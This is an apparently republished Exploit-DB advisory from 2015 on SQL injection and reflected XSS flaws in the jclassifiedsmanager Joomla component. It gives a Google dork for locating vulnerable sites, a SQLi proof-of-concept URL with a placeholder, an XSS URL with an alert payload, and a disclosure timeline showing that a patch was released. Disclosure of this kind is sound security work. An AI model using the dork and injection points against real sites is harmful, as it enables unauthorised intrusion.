jclassifiedsmanager Multiple Vulnerabilities

vendor:

jclassifiedsmanager

by:

Sarath Nair aka AceNeon13

7.5

CVSS

HIGH

SQL Injection, XSS

89, 79

CWE

Product Name: jclassifiedsmanager

Affected Version From:

Affected Version To:

Patch Exists: YES

Related CWE:

CPE: cmsjunkie.com/classifieds-manager

Metasploit:

Other Scripts:

Platforms Tested:

2015

jclassifiedsmanager Multiple Vulnerabilities

The jclassifiedsmanager component is vulnerable to SQL Injection and XSS attacks. The 'id' parameter in the 'displayads' task is not sanitized, allowing an attacker to inject malicious SQL code. The 'view' parameter in the 'displayads' task is also not sanitized, allowing an attacker to inject arbitrary JavaScript code.

Mitigation:

The vendor has released a fix/patch for the vulnerabilities. Users are advised to update to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13 
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager


# PoC Exploit: SQL Injection
-------------------------------- 
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]
"id" parameter is not sanitized.

# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1
"view" parameter is not sanitized.

########################################
# Vulnerability Disclosure Timeline:
 
2014-Dec-11:  Discovered vulnerability
2014-Dec-12:  Vendor Notification
2014-Dec-12:  Vendor Response/Feedback
2015-Jan-19:  Vendor Fix/Patch
2015-Jan-26:  Public Disclosure
#######################################